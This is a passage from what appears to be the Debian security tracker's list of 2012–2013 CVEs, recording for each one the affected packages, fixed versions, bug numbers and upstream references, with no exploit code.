#700158) [squeeze] - ganglia (Minor issue) [wheezy] - ganglia (Minor issue) - ganglia-web (bug #700159) NOTE: https://github.com/ganglia/ganglia-web/commit/31d348947419058c43b8dfcd062e2988abd5058e NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=892823 CVE-2013-0274 (upnp.c in libpurple in Pidgin before 2.10.7 does not properly ...) - pidgin 2.10.6-3 NOTE: http://www.pidgin.im/news/security/?id=68 CVE-2013-0273 (sametime.c in the Sametime protocol plugin in libpurple in Pidgin ...) - pidgin 2.10.6-3 NOTE: http://pidgin.im/news/security/?id=67 CVE-2013-0272 (Buffer overflow in http.c in the MXit protocol plugin in libpurple in ...) - pidgin 2.10.6-3 NOTE: http://pidgin.im/news/security/?id=66 CVE-2013-0271 (The MXit protocol plugin in libpurple in Pidgin before 2.10.7 might ...) - pidgin 2.10.6-3 NOTE: http://pidgin.im/news/security/?id=65 CVE-2013-0270 (OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier ...) NOTE: Duplicate of CVE-2013-0247, see bug #700240 NOTE: https://bugs.launchpad.net/keystone/+bug/1099025 CVE-2013-0269 (The JSON gem before 1.5.5, 1.6.x before 1.6.8, and 1.7.x before 1.7.7 ...) - ruby-json 1.7.3-3 (bug #700436) - libjson-ruby - ruby1.9.1 1.9.3.194-7 (bug #700436) - ruby1.8 (json ext not present in 1.8) CVE-2013-0268 (The msr_open function in arch/x86/kernel/msr.c in the Linux kernel ...) - linux 3.2.39-1 - linux-2.6 2.6.32-48squeeze1 CVE-2013-0267 RESERVED NOT-FOR-US: Apache VCL CVE-2013-0266 (manifests/base.pp in the puppetlabs-cinder module, as used in ...) NOT-FOR-US: Openstack Packstack CVE-2013-0265 (The redirect_stderr function in xnbd_common.c in xnbd-server and ...) - xnbd 0.1.0-pre-hg20-e75b93a47722-3 (low) NOTE: http://seclists.org/oss-sec/2013/q1/248 CVE-2013-0264 RESERVED NOT-FOR-US: Cumin CVE-2013-0263 (Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5, ...) - ruby-rack 1.4.1-2.1 (bug #700226) - librack-ruby (bug #700226) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=802794 NOTE: Patches in git, commits 0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07 and 9a81b961457805f6d1a5c275d053068440421e11 CVE-2013-0262 (rack/file.rb (Rack::File) in Rack 1.5.x before 1.5.2 and 1.4.x before ...) - ruby-rack 1.4.1-2.1 (bug #700173) - librack-ruby (Introduced in 1.4.0, see #700226) NOTE: Patches in git, commit 6f237e4c9fab649d3750482514f0fde76c56ab30 CVE-2013-0261 ((1) installer/basedefs.py and (2) modules/ospluginutils.py in ...) NOT-FOR-US: Openstack Packstack CVE-2013-0260 (Unspecified vulnerability in the Drush Debian Packaging module for ...) NOT-FOR-US: Drupal module debuild NOTE: This is a different thing from the drush package. CVE-2013-0259 (Cross-site scripting (XSS) vulnerability in the Boxes module 7.x-1.x ...) NOT-FOR-US: Drupal module Boxes CVE-2013-0258 (The Google Authenticator login (ga_login) module 7.x before 7.x-1.3 ...) NOT-FOR-US: Drupal module ga_login CVE-2013-0257 (The email2image module 6.x-1.x and 6.x-2.x for Drupal does not ...) NOT-FOR-US: Drupal module email2image CVE-2013-0256 (darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before ...) - ruby1.9.1 1.9.3.194-6 (low; bug #699929) - ruby1.8 (Only affects 1.9 and 2.0) NOTE: http://marc.info/?l=oss-security&m=136021623726440&w=2 NOTE: https://github.com/rdoc/rdoc/commit/ffa87887ee0517793df7541629a470e331f9fe60 CVE-2013-0255 (PostgreSQL 9.2.x before 9.2.3, 9.1.x before 9.1.8, 9.0.x before ...) {DSA-2630-1} - postgresql-9.1 9.1.8-1 - postgresql-8.4 8.4.16-1 CVE-2013-0254 (The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before ...) - qt4-x11 4:4.8.2+dfsg-11 (bug #699870) CVE-2013-0253 (The default configuration of Apache Maven 3.0.4, when using Maven ...) - wagon2 2.2-3+nmu1 (bug #701991) CVE-2013-0252 (boost::locale::utf::utf_traits in the Boost.Locale library in Boost ...) - boost1.50 (bug #699650) - boost1.49 1.49.0-3.2 (bug #699649) - boost1.42 (Boost.Locale was not part of boost until 1.48.0, bug #699719) CVE-2013-0251 (Stack-based buffer overflow in llogincircuit.cc in latd 1.25 through ...) - latd 1.31 (low; bug #699625) [squeeze] - latd (Minor issue) CVE-2013-0250 [corosync: Remote DoS due improper HMAC initialization] RESERVED - corosync (Introduced in v1.99.8-2-ge925f42; bug #699615) NOTE: https://github.com/corosync/corosync/commit/4378915a33ab7fbbb5874f79dd7cd71b014ef44e#L0R407 NOTE: http://www.openwall.com/lists/oss-security/2013/02/01/1 CVE-2013-0249 (Stack-based buffer overflow in the Curl_sasl_create_digest_md5_message ...) - curl 7.29.0-1 (bug #700002) [squeeze] - curl (Only affects 7.26.0 to 7.28.1) [wheezy] - curl 7.26.0-1+wheezy1 CVE-2013-0248 (The default configuration of javax.servlet.context.tempdir in Apache ...) - libcommons-fileupload-java (unimportant) NOTE: Only affects example code CVE-2013-0247 (OpenStack Keystone Essex 2012.1.3 and earlier, Folsom 2012.2.3 and ...) - keystone 2012.1.1-12 (bug #699835) CVE-2013-0246 [Access bypass Image module - Drupal 7] RESERVED - drupal7 7.14-1.3 (bug #698334) NOTE: https://drupal.org/SA-CORE-2013-001 CVE-2013-0245 [Access bypass Book module printer friendly version - Drupal 6 and 7] RESERVED - drupal6 (bug #698333) - drupal7 7.14-1.3 (bug #698334) NOTE: https://drupal.org/SA-CORE-2013-001 CVE-2013-0244 [Cross-site scripting (Various core and contributed modules - Drupal 6 and 7)] RESERVED - drupal6 (bug #698333) - drupal7 7.14-1.3 (bug #698334) NOTE: https://drupal.org/SA-CORE-2013-001 CVE-2013-0242 (Buffer overflow in the extend_buffers function in the regular ...) - eglibc 2.17-2 (low; bug #699399) [wheezy] - eglibc (Minor issue) [squeeze] - eglibc (Minor issue) NOTE: http://seclists.org/oss-sec/2013/q1/202 CVE-2013-0241 (The QXL display driver in QXL Virtual GPU 0.1.0 allows local users to ...) - xserver-xorg-video-qxl 0.0.17-1 (bug #699396) NOTE: http://seclists.org/oss-sec/2013/q1/204 TODO: check, whether this affects Stable, does qemu-KVM in Stable enable SPICE? CVE-2013-0240 (Gnome Online Accounts (GOA) 3.4.x, 3.6.x before 3.6.3, and 3.7.x ...) - gnome-online-accounts 3.4.2-2 (bug #699825) CVE-2013-0239 (Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2013-0238 (The try_parse_v4_netmask function in hostmask.c in IRCD-Hybrid before ...) {DSA-2618-1} - ircd-hybrid 1:7.2.2.dfsg.2-10 (bug #699267; high) [squeeze] - ircd-hybrid 7.2.2.dfsg.2-6.2+squeeze1 - oftc-hybrid CVE-2013-0237 [wordpress: XSS in external library Plupload fixed in 3.5.1] RESERVED - wordpress 3.5.1+dfsg-1 (bug #698929) NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/ NOTE: CVE request http://www.openwall.com/lists/oss-security/2013/01/25/7 CVE-2013-0236 [wordpress: XSS fixed in 3.5.1] RESERVED - wordpress 3.5.1+dfsg-1 (bug #698927) NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/ NOTE: CVE request http://www.openwall.com/lists/oss-security/2013/01/25/7 CVE-2013-0235 [wordpress: server-side request forgery and remote port scanning using pingbacks] RESERVED - wordpress 3.5.1+dfsg-1 (bug #698916) NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/ NOTE: CVE request http://www.openwall.com/lists/oss-security/2013/01/25/7 CVE-2013-0234 RESERVED - elgg (bug #526197) CVE-2013-0233 (Devise gem 2.2.x before 2.2.3, 2.1.x before 2.1.3, 2.0.x before 2.0.5, ...) - ruby-devise (bug #691525) CVE-2013-0232 (includes/functions.php in ZoneMinder Video Server 1.24.0, 1.25.0, and ...) {DSA-2640-1} - zoneminder 1.25.0-4 (bug #698910) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=904103 NOTE: Upstream forum post: http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771 CVE-2013-0231 (The pciback_enable_msi function in the PCI backend driver ...) {DSA-2632-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-0230 (Stack-based buffer overflow in the ExecuteSoapAction function in the ...) - miniupnpd CVE-2013-0229 (The ProcessSSDPRequest function in minissdp.c in the SSDP handler in ...) - miniupnpd CVE-2013-0228 (The xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel ...) - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 NOTE: was actually fixed in 2.6.32-46squeeze1 but upload was done and no DSA was released for that version. CVE-2013-0227 (Cross-site scripting (XSS) vulnerability in the Search API Sorts ...) NOT-FOR-US: Drupal addon CVE-2013-0226 (The Keyboard Shortcut Utility module 7.x-1.x before 7.x-1.1 for Drupal ...) NOT-FOR-US: Drupal addon CVE-2013-0225 (Cross-site scripting (XSS) vulnerability in the User Relationships ...) NOT-FOR-US: Drupal addon CVE-2013-0224 (The Video module 7.x-2.x before 7.x-2.9 for Drupal, when using the ...) NOT-FOR-US: Drupal addon CVE-2013-0223 RESERVED - coreutils (Affected patch not added to Debian package) NOTE: http://www.openwall.com/lists/oss-security/2013/01/21/14 CVE-2013-0222 RESERVED - coreutils (Affected patch not added to Debian package) NOTE: http://www.openwall.com/lists/oss-security/2013/01/21/14 CVE-2013-0221 RESERVED - coreutils (Affected patch not added to Debian package) NOTE: http://www.openwall.com/lists/oss-security/2013/01/21/14 CVE-2013-0220 (The (1) sss_autofs_cmd_getautomntent and (2) ...) - sssd 1.8.4-2 (bug #698871) CVE-2013-0219 (System Security Services Daemon (SSSD) before 1.9.4, when (1) ...) - sssd 1.8.4-2 (bug #698871) CVE-2013-0218 (The GUI installer in JBoss Enterprise Application Platform (EAP) and ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2013-0217 (Memory leak in drivers/net/xen-netback/netback.c in the Xen netback ...) - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 CVE-2013-0216 (The Xen netback functionality in the Linux kernel before 3.7.8 allows ...) - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 CVE-2013-0215 (oxenstored in Xen 4.1.x, Xen 4.2.x, and xen-unstable does not properly ...) - xen (ocaml version of the xenstore daemon not used in Debian) CVE-2013-0214 (Cross-site request forgery (CSRF) vulnerability in the Samba Web ...) {DSA-2617-1} - samba 2:3.6.6-5 CVE-2013-0213 (The Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, ...) {DSA-2617-1} - samba 2:3.6.6-5 CVE-2013-0212 (store/swift.py in OpenStack Glance Essex (2012.1), Folsom (2012.2) ...) - glance 2012.1.1-4 CVE-2013-0211 RESERVED - libarchive 3.0.4-3 (bug #703957) CVE-2013-0210 RESERVED CVE-2013-0209 (lib/MT/Upgrade.pm in mt-upgrade.cgi in Movable Type 4.2x and 4.3x ...) {DSA-2611-1} - movabletype-opensource 5.1.2+dfsg-1 (bug #697666) NOTE: Versions 5.0 or higher not affected CVE-2013-0208 (The boot-from-volume feature in OpenStack Compute (Nova) Folsom and ...) - nova 2012.1.1-12 CVE-2013-0207 (Cross-site request forgery (CSRF) vulnerability in the Mark Complete ...) NOT-FOR-US: module for Drupal CVE-2013-0206 (Unrestricted file upload vulnerability in the Live CSS module 6.x-2.x ...) NOT-FOR-US: module for Drupal CVE-2013-0205 (Cross-site request forgery (CSRF) vulnerability in the RESTful Web ...) NOT-FOR-US: module for Drupal CVE-2013-0204 [Code execution in external storage] RESERVED - owncloud (Vulnerably code not present, only affects 4.5 branch) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-002/ CVE-2013-0203 [XSS vulnerabilities] RESERVED - owncloud 4.0.8debian-1.4 (bug #698737) [wheezy] - owncloud 4.0.4debian2-3.3 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/ CVE-2013-0202 [XSS vulnerabilities] RESERVED - owncloud 4.0.8debian-1.4 (bug #698737) [wheezy] - owncloud 4.0.4debian2-3.3 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/ CVE-2013-0201 [XSS vulnerabilities] RESERVED - owncloud 4.0.8debian-1.4 (bug #698737) [wheezy] - owncloud 4.0.4debian2-3.3 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/ CVE-2013-0200 (HP Linux Imaging and Printing (HPLIP) through 3.12.4 allows local ...) - hplip 3.12.6-3.1 (bug #701185) CVE-2013-0199 RESERVED NOT-FOR-US: FreeIPA CVE-2013-0198 (Dnsmasq before 2.66test2, when used with certain libvirt ...) - dnsmasq (low) [wheezy] - dnsmasq (Minor issue) [squeeze] - dnsmasq (Minor issue) NOTE: CVE request http://www.openwall.com/lists/oss-security/2013/01/18/2 CVE-2013-0197 [XSS vulnerability with match_type filter] RESERVED - mantis (This only affects the 1.2.12 version, which isn't present in Debian, bug #698481) NOTE: http://www.mantisbt.org/bugs/view.php?id=15373 CVE-2013-0196 RESERVED CVE-2013-0195 [Unspecified XSS] RESERVED - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0194 [Unspecified XSS] RESERVED - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0193 [Unspecified XSS] RESERVED - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0192 RESERVED NOT-FOR-US: Simple Machines Forum CVE-2013-0188 RESERVED CVE-2013-0190 (The xen_failsafe_callback function in Xen for the Linux kernel 2.6.23 ...) - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-47 CVE-2013-0189 (cachemgr.cgi in Squid 3.1.x and 3.2.x, possibly 3.1.22, 3.2.4, and ...) {DSA-2631-1} - squid 2.7.STABLE9-2 NOTE: squid-cgi was removed in 2.7.STABLE9-2 - squid3 3.1.20-2.1 (bug #696187) NOTE: possible regression, see #701123 CVE-2013-0191 [pam-pgsql NULL password handling issue] RESERVED - pam-pgsql 0.7.3.1-4 (bug #698241) [squeeze] - pam-pgsql 0.7.1-4+squeeze2 NOTE: patch: https://sourceforge.net/u/lvella/pam-pgsql/ci/9361f5970e5dd90a747319995b67c2f73b91448c/ NOTE: bugreport: https://sourceforge.net/p/pam-pgsql/bugs/13/ CVE-2013-0187 RESERVED CVE-2013-0186 RESERVED CVE-2013-0185 RESERVED CVE-2013-0184 (Unspecified vulnerability in Rack::Auth::AbstractRequest in Rack 1.1.x ...) - ruby-rack 1.4.1-2.1 (bug #698440) - librack-ruby CVE-2013-0183 (multipart/parser.rb in Rack 1.3.x before 1.3.8 and 1.4.x before 1.4.3 ...) - ruby-rack 1.4.1-2.1 (bug #698440) - librack-ruby CVE-2013-0182 (The Payment module 7.x-1.x before 7.x-1.3 for Drupal does not properly ...) NOT-FOR-US: Drupal module Payment CVE-2013-0181 (Cross-site scripting (XSS) vulnerability in Views in the Search API ...) NOT-FOR-US: Drupal module search_api CVE-2013-0180 RESERVED CVE-2013-0179 [memcached DoS] RESERVED - memcached 1.4.13-0.2 (low; bug #698231) [squeeze] - memcached (Minor issue) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=895054 NOTE: https://code.google.com/p/memcached/issues/detail?id=306 NOTE: https://code.google.com/p/memcached/issues/attachmentText?id=306&aid=3060004000&name=0001-Fix-buffer-overrun-when-logging-key-to-delete-in-bin.patch CVE-2013-0178 [redis 2.4: Insecure temporary flaw use for redis service's vm swap file] RESERVED - redis 2:2.6.0-1 (low) [squeeze] - redis (Minor issue) [wheezy] - redis (Minor issue) NOTE: RedHat bugreport mentions 2.4 is affected, but not 2.6 CVE-2013-0177 RESERVED NOT-FOR-US: OFBiz CVE-2013-0176 (The publickey_from_privatekey function in libssh before 0.5.4, when no ...) - libssh 0.5.4-1 (low; bug #698963) [squeeze] - libssh (Minor issue) NOTE: http://www.libssh.org/2013/01/22/libssh-0-5-4-security-release/ NOTE: http://git.libssh.org/projects/libssh.git/commit/?h=v0-5&id=55b09f426417406bb25c0b9c474fbab1398b0dc8 CVE-2013-0175 (multi_xml gem 0.5.2 for Ruby, as used in Grape before 0.2.6 and ...) - ruby-multi-xml (bug #691189) NOTE: fixed in https://rubygems.org/gems/multi_xml/versions/0.5.2 CVE-2013-0174 RESERVED CVE-2013-0173 RESERVED CVE-2013-0172 (Samba 4.0.x before 4.0.1, in certain Active Directory ...) - samba4 4.0.0~beta2+dfsg1-3.1 (high; bug #699188) - samba (Only affects Active Directory functionality) NOTE: https://lists.samba.org/archive/samba-technical/2013-January/089911.html CVE-2013-0171 RESERVED CVE-2013-0170 (Use-after-free vulnerability in the virNetMessageFree function in ...) - libvirt 0.9.12-6 (bug #699224) [squeeze] - libvirt (Vulnerable code not present, see bug #699224) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=893450 NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=46532e3e8ed5f5a736a02f67d6c805492f9ca720 CVE-2013-0169 (The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as ...) {DSA-2622-1 DSA-2621-1} - openssl 1.0.1e-1 (bug #699889) - bouncycastle 1.48+dfsg-2 (low; bug #699885) [wheezy] - bouncycastle (Minor issue) [squeeze] - bouncycastle (Minor issue) - mysql-5.1 - mysql-5.5 5.5.30+dfsg-1.1 (bug #699886) - polarssl 1.1.4-2 (bug #699887) - nss 2:3.14.3-1 (bug #699888) - gnutls26 2.12.20-4 - gnutls28 3.0.22-3 - openjdk-7 7u3-2.1.6-1 - openjdk-6 6b27-1.12.3-1 NOTE: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf CVE-2013-0168 (The MoveDisk command in Red Hat Enterprise Virtualization Manager ...) NOTE: RHEV management tool CVE-2013-0167 RESERVED CVE-2013-0166 (OpenSSL before 0.9.8y, 1.0.0 before 1.0.0k, and 1.0.1 before 1.0.1d ...) {DSA-2621-1} - openssl 1.0.1e-1 (bug #699889) CVE-2013-0165 RESERVED CVE-2013-0164 (The lockwrap function in port-proxy/bin/openshift-port-proxy-cfg in ...) NOT-FOR-US: OpenShift CVE-2013-0163 RESERVED CVE-2013-0162 (The diff_pp function in lib/gauntlet_rubyparser.rb in the ruby_parser ...) - ruby-parser 2.3.1-2 (bug #701637) NOTE: http://www.openwall.com/lists/oss-security/2013/02/22/5 CVE-2013-0161 RESERVED NOT-FOR-US: Havalite CMS CVE-2013-0160 (The Linux kernel through 3.7.9 allows local users to obtain sensitive ...) {DSA-2669-1} - linux (unimportant) - linux-2.6 (unimportant) NOTE: Minor information leak, rather a missing hardening feature than a security vulnerability. CVE-2013-0159 RESERVED NOT-FOR-US: Fedora build script CVE-2013-0158 (Unspecified vulnerability in CloudBees Jenkins before 1.498, Jenkins ...) - jenkins 1.480.2+dfsg-1~exp1 (bug #697617) NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2013-01-04 CVE-2013-0157 [mount discloses information about existence of folders] RESERVED - util-linux (bug #697464; low) [squeeze] - util-linux (Minor issue) [wheezy] - util-linux (Minor issue) CVE-2013-0156 (active_support/core_ext/hash/conversions.rb in Ruby on Rails before ...) {DSA-2604-1} - rails 2.3.14.1 (bug #697722; high) - ruby-activesupport-2.3 2.3.14-5 (bug #697789) - ruby-activesupport-3.2 3.2.6-5 (bug #697790) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: http://www.insinuator.net/2013/01/rails-yaml/ NOTE: http://www.openwall.com/lists/oss-security/2013/01/08/14 NOTE: experimental has 3.2.8-1 and should be affected too CVE-2013-0155 (Ruby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x ...) {DSA-2609-1} - ruby-activerecord-3.2 3.2.6-4 (bug #697744) - ruby-activerecord-2.3 2.3.14-4 - ruby-actionpack-3.2 3.2.6-5 (bug #697802) - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: http://www.openwall.com/lists/oss-security/2013/01/08/13 CVE-2013-0154 (The get_page_type function in xen/arch/x86/mm.c in Xen 4.2, when ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0153 (The AMD IOMMU support in Xen 4.2.x, 4.1.x, 3.3, and other versions, ...) {DSA-2636-1} - xen 4.1.4-2 CVE-2013-0152 (Memory leak in Xen 4.2 and unstable allows local HVM guests to cause a ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0151 (The do_hvm_op function in xen/arch/x86/hvm/hvm.c in Xen 4.2.x on the ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0150 RESERVED CVE-2013-0149 RESERVED CVE-2013-0148 RESERVED CVE-2013-0147 RESERVED CVE-2013-0146 RESERVED CVE-2013-0145 (Buffer overflow in the TFTPD service in Serva32 2.1.0 allows remote ...) TODO: check CVE-2013-0144 RESERVED CVE-2013-0143 RESERVED CVE-2013-0142 RESERVED CVE-2013-0141 (Directory traversal vulnerability in McAfee ePolicy Orchestrator (ePO) ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2013-0140 (SQL injection vulnerability in the Agent-Handler component in McAfee ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2013-0139 (The Arecont Vision AV1355DN MegaDome camera allows remote attackers to ...) NOT-FOR-US: Arecont Vision CVE-2013-0138 (BitZipper 2013 before Update 1 allows remote attackers to execute ...) NOT-FOR-US: BitZipper CVE-2013-0137 RESERVED CVE-2013-0136 RESERVED CVE-2013-0135 (Multiple SQL injection vulnerabilities in PHP Address Book 8.2.5 allow ...) NOT-FOR-US: PHP Address Book CVE-2013-0134 (Cross-site scripting (XSS) vulnerability in the web interface in ...) NOT-FOR-US: AirDroid CVE-2013-0133 (Untrusted search path vulnerability in ...) NOT-FOR-US: Parallels Plesk Panel CVE-2013-0132 (The suexec implementation in Parallels Plesk Panel 11.0.9 contains a ...) NOT-FOR-US: Parallels Plesk Panel CVE-2013-0131 (Buffer overflow in the NVIDIA GPU driver before 304.88, 310.x before ...) - nvidia-graphics-drivers 304.88-1 (bug #704547) [wheezy] - nvidia-graphics-drivers (Non-free not supported) [squeeze] - nvidia-graphics-drivers (Non-free not supported) NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3290 CVE-2013-0130 (Multiple buffer overflows in Core FTP before 2.2 build 1769 allow ...) NOT-FOR-US: Core FTP CVE-2013-0129 (Multiple cross-site scripting (XSS) vulnerabilities in pd-admin before ...) NOT-FOR-US: pd-admin CVE-2013-0128 (The Contact Customer Support feature in the TigerText Free Private ...) NOT-FOR-US: TigerText CVE-2013-0127 (IBM Lotus Notes 8.x before 8.5.3 FP4 Interim Fix 1 and 9.0 before ...) NOT-FOR-US: IBM Lotus Notes CVE-2013-0126 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Verizon router CVE-2013-0125 (Cross-site scripting (XSS) vulnerability in fileview.asp in C2 ...) NOT-FOR-US: C2 WebResource CVE-2013-0124 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: ASKIA CVE-2013-0123 (Multiple SQL injection vulnerabilities in the administration interface ...) NOT-FOR-US: ASKIA CVE-2013-0122 (The avast! Mobile Security application before 2.0.4400 for Android ...) NOT-FOR-US: avast! Mobile Security application CVE-2013-0121 RESERVED CVE-2013-0120 (The web interface on Dell PowerConnect 6248P switches allows remote ...) NOT-FOR-US: Dell Switches CVE-2013-0119 RESERVED CVE-2013-0118 (CS-Cart before 3.0.6, when PayPal Standard Payments is configured, ...) NOT-FOR-US: CS-Cart CVE-2013-0117 RESERVED CVE-2013-0116 RESERVED CVE-2013-0115 RESERVED CVE-2013-0114 RESERVED CVE-2013-0113 (Nuance PDF Reader 7.0 and PDF Viewer Plus 7.1 allow remote attackers ...) NOT-FOR-US: Nuance PDF Reader CVE-2013-0112 RESERVED CVE-2013-0111 (daemonu.exe (aka the NVIDIA Update Service Daemon), as distributed ...) NOT-FOR-US: NVIDIA Update Service Daemon CVE-2013-0110 (nvSCPAPISvr.exe in the NVIDIA Stereoscopic 3D Driver service, as ...) NOT-FOR-US: NVIDIA Stereoscopic 3D Driver service CVE-2013-0109 (The NVIDIA driver before 307.78, and Release 310 before 311.00, in the ...) NOT-FOR-US: NVIDIA Display Driver service on Windows CVE-2013-0108 (An ActiveX control in HscRemoteDeploy.dll in Honeywell Enterprise ...) NOT-FOR-US: Honeywell CVE-2013-0107 (Stack-based buffer overflow in Foxit Advanced PDF Editor 3 before 3.04 ...) NOT-FOR-US: Foxit Advanced PDF Editor CVE-2013-0106 RESERVED CVE-2013-0105 RESERVED CVE-2013-0104 RESERVED CVE-2013-0103 RESERVED CVE-2013-0102 RESERVED CVE-2013-0101 RESERVED CVE-2012-6323 RESERVED CVE-2012-6322 RESERVED CVE-2012-6321 RESERVED CVE-2012-6320 RESERVED CVE-2012-6319 RESERVED CVE-2012-6318 RESERVED CVE-2012-6317 RESERVED CVE-2012-6316 RESERVED CVE-2012-6315 REJECTED CVE-2012-6314 (Citrix XenDesktop Virtual Desktop Agent (VDA) 5.6.x before 5.6.200, ...) NOT-FOR-US: Citrix XenDesktop CVE-2012-6313 (simple-gmail-login.php in the Simple Gmail Login plugin before 1.1.4 ...) NOT-FOR-US: Wordpress plugin CVE-2012-6312 (Cross-site scripting (XSS) vulnerability in the Video Lead Form plugin ...) NOT-FOR-US: Wordpress plugin CVE-2012-6311 RESERVED CVE-2012-6310 RESERVED CVE-2012-6309 RESERVED CVE-2012-6308 RESERVED CVE-2012-6307 RESERVED CVE-2012-6306 RESERVED CVE-2012-6305 RESERVED CVE-2012-6304 RESERVED CVE-2012-6303 [WaveSurfer and Snack Sound Toolkit buffer overflows] RESERVED - snack 2.2.10-dfsg1-12.1 (low; bug #695614) [squeeze] - snack 2.2.10-dfsg1-9+squeeze1 - wavesurfer (originally reported in wavesurfer, but actually a bug in libsnack, see bug #695615) NOTE: http://secunia.com/advisories/49889/ NOTE: http://www.openwall.com/lists/oss-security/2012/12/10/2 CVE-2012-6302 RESERVED CVE-2012-6301 (The Browser application in Android 4.0.3 allows remote attackers to ...) NOT-FOR-US: Android browser CVE-2012-6300 RESERVED CVE-2012-6299 (Unspecified vulnerability in CA IdentityMinder r12.0 through CR16, ...) NOT-FOR-US: CA IdentityMinder CVE-2012-6298 (Unspecified vulnerability in CA IdentityMinder r12.0 through CR16, ...) NOT-FOR-US: CA IdentityMinder CVE-2012-6297 RESERVED CVE-2012-6296 RESERVED CVE-2012-6295 RESERVED CVE-2012-6294 RESERVED CVE-2012-6293 RESERVED CVE-2012-6292 RESERVED CVE-2012-6291 RESERVED CVE-2012-6290 RESERVED CVE-2012-6289 RESERVED CVE-2012-6288 RESERVED CVE-2012-6287 RESERVED CVE-2012-6286 RESERVED CVE-2012-6285 RESERVED CVE-2012-6284 RESERVED CVE-2012-6283 RESERVED CVE-2012-6282 RESERVED CVE-2012-6281 RESERVED CVE-2012-6280 RESERVED CVE-2012-6279 RESERVED CVE-2012-6278 RESERVED CVE-2012-6277 RESERVED CVE-2012-6276 (Directory traversal vulnerability in the web-based management ...) NOT-FOR-US: TP-LINK TL-WR841N CVE-2012-6275 (Multiple stack-based buffer overflows in AntDS.exe in BigAntSoft ...) NOT-FOR-US: BigAnt IM Server CVE-2012-6274 (BigAntSoft BigAnt IM Message Server does not require authentication ...) NOT-FOR-US: BigAnt IM Server CVE-2012-6273 (SQL injection vulnerability in BigAntSoft BigAnt IM Message Server ...) NOT-FOR-US: BigAnt IM Server CVE-2012-6272 (Multiple cross-site scripting (XSS) vulnerabilities in Dell OpenManage ...) NOT-FOR-US: Dell OpenManage Server Administrator CVE-2012-6271 (Adobe Shockwave Player through 11.6.8.638 allows remote attackers to ...) NOT-FOR-US: Adobe Shockwave CVE-2012-6270 (Adobe Shockwave Player through 11.6.8.638 allows remote attackers to ...) NOT-FOR-US: Adobe Shockwave CVE-2012-6269 RESERVED CVE-2012-6268 RESERVED CVE-2012-6267 RESERVED CVE-2012-6266 RESERVED CVE-2012-6265 RESERVED CVE-2012-6264 RESERVED CVE-2012-6263 RESERVED CVE-2012-6262 RESERVED CVE-2012-6261 RESERVED CVE-2012-6260 RESERVED CVE-2012-6259 RESERVED CVE-2012-6258 RESERVED CVE-2012-6257 RESERVED CVE-2012-6256 RESERVED CVE-2012-6255 RESERVED CVE-2012-6254 RESERVED CVE-2012-6253 RESERVED CVE-2012-6252 RESERVED CVE-2012-6251 RESERVED CVE-2012-6250 RESERVED CVE-2012-6249 RESERVED CVE-2012-6248 RESERVED CVE-2012-6247 RESERVED CVE-2012-6246 RESERVED CVE-2012-6245 RESERVED CVE-2012-6244 RESERVED CVE-2012-6243 RESERVED CVE-2012-6242 RESERVED CVE-2012-6241 RESERVED CVE-2012-6240 RESERVED CVE-2012-6239 RESERVED CVE-2012-6238 RESERVED CVE-2012-6237 RESERVED CVE-2012-6236 RESERVED CVE-2012-6235 RESERVED CVE-2012-6234 RESERVED CVE-2012-6233 RESERVED CVE-2012-6232 RESERVED CVE-2012-6231 RESERVED CVE-2012-6230 RESERVED CVE-2012-6229 RESERVED CVE-2012-6228 RESERVED CVE-2012-6227 RESERVED CVE-2012-6226 RESERVED CVE-2012-6225 RESERVED CVE-2012-6224 RESERVED CVE-2012-6223 RESERVED CVE-2012-6222 RESERVED CVE-2012-6221 RESERVED CVE-2012-6220 RESERVED CVE-2012-6219 RESERVED 